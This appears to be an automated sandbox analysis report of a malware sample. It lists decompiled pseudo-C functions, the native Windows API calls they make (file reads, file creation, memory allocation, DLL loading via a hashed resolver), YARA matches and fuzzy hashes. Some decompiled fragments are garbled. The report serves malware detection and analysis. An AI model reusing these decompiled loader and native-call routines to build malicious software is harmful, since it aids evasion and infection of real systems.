				_t16 = _a4;
				_t33 = _a4 + 0xc48;
				E00418DC0(_t31, _t16, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t8 =  &_a32; // 0x413d52
				_t14 =  &_a8; // 0x413d52
				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t32, _t35); // executed
				return _t21;
			}







                                                          0x0041826c
                                                          0x00418273
                                                          0x0041827f
                                                          0x00418287
                                                          0x00418292
                                                          0x004182ad
                                                          0x004182b5
                                                          0x004182b9

                                                          APIs
                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: R=A$R=A
                                                          • API String ID: 2738559852-3742021989
                                                          • Opcode ID: 7a544b5e9beb00c7abb48c378330707728f83c1694479f4e5a983f87595beab2
                                                          • Instruction ID: 06aea5ea9b62c8f08385dfefd69c4e159e0f69636af22cb6cae9cca6d72240a1
                                                          • Opcode Fuzzy Hash: 7a544b5e9beb00c7abb48c378330707728f83c1694479f4e5a983f87595beab2
                                                          • Instruction Fuzzy Hash: E9F0BDB6200104AFCB14DF89DC80DEB77A9FF8C354F158649FA1D97251DA34E951CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00409B20(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                          0x00409b3c
                                                          0x00409b3f
                                                          0x00409b44
                                                          0x00409b49
                                                          0x00409b53
                                                          0x00409b58
                                                          0x00409b5b
                                                          0x00409b5d
                                                          0x00409b65
                                                          0x00409b6a
                                                          0x00409b6a
                                                          0x00409b71
                                                          0x00409b79
                                                          0x00409b7c
                                                          0x00409b7e
                                                          0x00409b92
                                                          0x00000000
                                                          0x00409b94
                                                          0x00409b9a
                                                          0x00409b4e
                                                          0x00409b4e
                                                          0x00409b4e

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 44filenativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 44%
                                                          			E004181BA(intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t21;
				void* _t32;

				asm("int1");
				asm("das");
				asm("aad 0x5a");
				asm("sbb edx, [ebp-0x75]");
				_t15 = _a8;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DC0(_t32, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t21;
			}





                                                          0x004181ba
                                                          0x004181bb
                                                          0x004181bd
                                                          0x004181bf
                                                          0x004181c3
                                                          0x004181cf
                                                          0x004181d7
                                                          0x0041820d
                                                          0x00418211

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: b410dabae7d3bf98101e7d50e7c9945d6d7e0980f008fda0bfad65246244ee13
                                                          • Instruction ID: e51cda5be7c0432cde36c699c22da099f53b33a42e32be49aa857797f1c1653f
                                                          • Opcode Fuzzy Hash: b410dabae7d3bf98101e7d50e7c9945d6d7e0980f008fda0bfad65246244ee13
                                                          • Instruction Fuzzy Hash: 8901A4B2240108AFCB18CF99DC85DEB77E9AF8C754F158658FA0D97241C634E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                          0x004181cf
                                                          0x004181d7
                                                          0x0041820d
                                                          0x00418211

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E004182EA(void* __eax, void* __ebx, char _a1, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {
				void* _t9;
				char* _t29;

				_t9 = __eax - 0xf5;
				asm("popfd");
				_t29 =  &_a1;
				if (_t29 < 0) goto L3;
				_push(_t29);
			}





                                                          0x004182ea
                                                          0x004182ec
                                                          0x004182ee
                                                          0x004182ef
                                                          0x004182f0

                                                          APIs
                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 99e770959f311ce0b3c1f0f640b19380c9e3587b099295d67f90f48bce30e7bd
                                                          • Instruction ID: b43b2f1aff78f2368a5bd9cbf9cc39af3ea3ae8a63b3d1812f99d6b7abf77256
                                                          • Opcode Fuzzy Hash: 99e770959f311ce0b3c1f0f640b19380c9e3587b099295d67f90f48bce30e7bd
                                                          • Instruction Fuzzy Hash: 0CF082B6200218ABD710EFD9DC80EEB736DEF88324F14865DFA5C9B241CA31E91187A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                          0x004183af
                                                          0x004183b7
                                                          0x004183d9
                                                          0x004183dd

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B198F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 063c528f82b1d001d0cb6d01bdc4c0f72764b0d2ff84c3e308f1a1df356ac1a8
                                                          • Instruction ID: d64984979b305ccb5e35b35acd27a0667bc32fad1515e89ea6ca52b66f6c8e22
                                                          • Opcode Fuzzy Hash: 063c528f82b1d001d0cb6d01bdc4c0f72764b0d2ff84c3e308f1a1df356ac1a8
                                                          • Instruction Fuzzy Hash: FC90026260101502D20171595404616004AD7D0391FA1C076A5054555ECA6589A3F171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4489c2ca7f14808274956fbbc9963faa1670cd6d7d3470695136c8ab4354a0ad
                                                          • Instruction ID: fc8cc9ee8be9c98fb4dd9e738ee057c4202b2c6b9eced3574650befb9a06e9f7
                                                          • Opcode Fuzzy Hash: 4489c2ca7f14808274956fbbc9963faa1670cd6d7d3470695136c8ab4354a0ad
                                                          • Instruction Fuzzy Hash: 6190027220101413D211615955047070049D7D0391FA1C466A4454558D96968963F161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a87bd7f3a249d6cfde7da98910aacc96d232c7ddbad664543b5fbc6e06de1c4f
                                                          • Instruction ID: 95f6909961eea0f216a17a31d6ae4d59bea172290c0c8aafaae842ca9f112f4a
                                                          • Opcode Fuzzy Hash: a87bd7f3a249d6cfde7da98910aacc96d232c7ddbad664543b5fbc6e06de1c4f
                                                          • Instruction Fuzzy Hash: AC900262242051525645B15954045074046E7E03917A1C066A5444950C85669867E661
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 89531899f8a4ac8a9ece141cc46f2db1eb4985ad4b455c023ff5d29ab6bed80f
                                                          • Instruction ID: 71b7c938c8e762d9706efb7f0032ee7508be3a1204aea600cfc989511619690f
                                                          • Opcode Fuzzy Hash: 89531899f8a4ac8a9ece141cc46f2db1eb4985ad4b455c023ff5d29ab6bed80f
                                                          • Instruction Fuzzy Hash: 2E9002A234101442D20061595414B060045D7E1351F61C069E5094554D8659CC63B166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 14799cad8b0f07284370b739a907d95a04f0e011f1aab40300d877f79d1bb079
                                                          • Instruction ID: 1a481d107f49ac290c7faa8630299d9132cfc41bee699d5ec2a46ee19c353434
                                                          • Opcode Fuzzy Hash: 14799cad8b0f07284370b739a907d95a04f0e011f1aab40300d877f79d1bb079
                                                          • Instruction Fuzzy Hash: 879002A220201003420571595414616404AD7E0351B61C075E5044590DC56588A2B165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: fa58dfa02bf966abbb3b3759d09f71554276a3d158b91a5e49dd339763a3e8af
                                                          • Instruction ID: 0bd72bcddb3dff370e960f814bb3b6dd2ede98572626d47e6cc89be2df15eed3
                                                          • Opcode Fuzzy Hash: fa58dfa02bf966abbb3b3759d09f71554276a3d158b91a5e49dd339763a3e8af
                                                          • Instruction Fuzzy Hash: DE9002B220101402D240715954047460045D7D0351F61C065A9094554E86998DE6B6A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3e80138d8b5ece78482768db8b5e55c350639e996ac3796d57c51564e5715ceb
                                                          • Instruction ID: c971a314c98f143b00dd96568ed88d3344b1584f747b0b17e502198f438016a4
                                                          • Opcode Fuzzy Hash: 3e80138d8b5ece78482768db8b5e55c350639e996ac3796d57c51564e5715ceb
                                                          • Instruction Fuzzy Hash: 9E900266211010030205A55917045070086D7D53A1361C075F5045550CD6618872A161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4a4d7d0a2e80a333107573396a1033c49ced439b8cc9b6aa5c91f9ad5764e643
                                                          • Instruction ID: cb6cbbc6d1471cc5f359a6ad98460fe7128d69dfddb69a2659d68c357978ac6a
                                                          • Opcode Fuzzy Hash: 4a4d7d0a2e80a333107573396a1033c49ced439b8cc9b6aa5c91f9ad5764e643
                                                          • Instruction Fuzzy Hash: F190027220109802D2106159940474A0045D7D0351F65C465A8454658D86D588A2B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9e83950b46826a34b4ca013e3159298a87cd56ab1115622e9cdc6fd77e368c02
                                                          • Instruction ID: bf6746e31020169648be33c61ae90c02cacae2c90904c8f6487dd40e4f67ee1c
                                                          • Opcode Fuzzy Hash: 9e83950b46826a34b4ca013e3159298a87cd56ab1115622e9cdc6fd77e368c02
                                                          • Instruction Fuzzy Hash: 35900262601010424240716998449064045FBE1361761C175A49C8550D85998876A6A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3d03f7c547199f99c02c7dee017407456afe7b34bec77374484adaf8b2866613
                                                          • Instruction ID: 7f15fa59ff672cabf126af0337b88c62a59e9ca56a2d1198431690febca14208
                                                          • Opcode Fuzzy Hash: 3d03f7c547199f99c02c7dee017407456afe7b34bec77374484adaf8b2866613
                                                          • Instruction Fuzzy Hash: 3B90027220141402D2006159581470B0045D7D0352F61C065A5194555D86658862B5B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 96d8a5747d9d81362ba1cdf758f5da86a6fd4160afb6ff4e805053ee72cd80ef
                                                          • Instruction ID: b6af3f1361b8eda67e540867a7bd53bdb9143e8686efc2481cc801b9ac8b9ecb
                                                          • Opcode Fuzzy Hash: 96d8a5747d9d81362ba1cdf758f5da86a6fd4160afb6ff4e805053ee72cd80ef
                                                          • Instruction Fuzzy Hash: B490027220101802D2807159540464A0045D7D1351FA1C069A4055654DCA558A6AB7E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: be723f97a22115a84c2df667997c16cf00a40dfc5a526e41fee41bd745b69660
                                                          • Instruction ID: 637c905627b5bb4a03c2226a37a8300c2a4b60c797d9970faddbf042d321cc0a
                                                          • Opcode Fuzzy Hash: be723f97a22115a84c2df667997c16cf00a40dfc5a526e41fee41bd745b69660
                                                          • Instruction Fuzzy Hash: 1C90026221181042D30065695C14B070045D7D0353F61C169A4184554CC9558872A561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B197A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 97fea27d785c315de790ce399a3fbe76edc4ac18f081c657f82872ca29ecf6e0
                                                          • Instruction ID: ac975c46d5e0f7df8dca8235b86e792b2019ac7a740ae201914cac43a2613f33
                                                          • Opcode Fuzzy Hash: 97fea27d785c315de790ce399a3fbe76edc4ac18f081c657f82872ca29ecf6e0
                                                          • Instruction Fuzzy Hash: D790026230101003D240715964186064045E7E1351F61D065E4444554CD9558867A262
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 90ac4d2fe1e55ca7839606a2acd8236460e0320a3da30e0fda1234f3c1de92ce
                                                          • Instruction ID: 97e9607d85c17da569d1c092a390032d692dd22a69bd0343887823db342f2310
                                                          • Opcode Fuzzy Hash: 90ac4d2fe1e55ca7839606a2acd8236460e0320a3da30e0fda1234f3c1de92ce
                                                          • Instruction Fuzzy Hash: 0390026A21301002D2807159640860A0045D7D1352FA1D469A4045558CC955887AA361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ed21aabf9a0523f6bcb01e784ae1ca2ae1e5e5fec629bc4608bec6cebb3214d0
                                                          • Instruction ID: 2f8e6501a8a7b22a223eba541d5298fd9ac55c90513cff6baae47b73a8a1c18b
                                                          • Opcode Fuzzy Hash: ed21aabf9a0523f6bcb01e784ae1ca2ae1e5e5fec629bc4608bec6cebb3214d0
                                                          • Instruction Fuzzy Hash: A890027231115402D210615994047060045D7D1351F61C465A4854558D86D588A2B162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: aec05a608b2908f4fddfbdfb1ba356a9ab9f5a27c84442cb2f96a6149610f366
                                                          • Instruction ID: 0a2e84f53e5d998816a2311ce4ee6503d69d22ba64237bff680257d2f5628551
                                                          • Opcode Fuzzy Hash: aec05a608b2908f4fddfbdfb1ba356a9ab9f5a27c84442cb2f96a6149610f366
                                                          • Instruction Fuzzy Hash: 2990027220101402D200659964086460045D7E0351F61D065A9054555EC6A588A2B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                          • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                          • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                          • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				L00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                          0x00407260
                                                          0x0040726f
                                                          0x00407273
                                                          0x0040727e
                                                          0x0040728e
                                                          0x0040729e
                                                          0x004072a3
                                                          0x004072aa
                                                          0x004072ad
                                                          0x004072ba
                                                          0x004072bc
                                                          0x004072be
                                                          0x004072db
                                                          0x004072db
                                                          0x00000000
                                                          0x004072dd
                                                          0x004072e2

                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                          • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                          • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                          • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

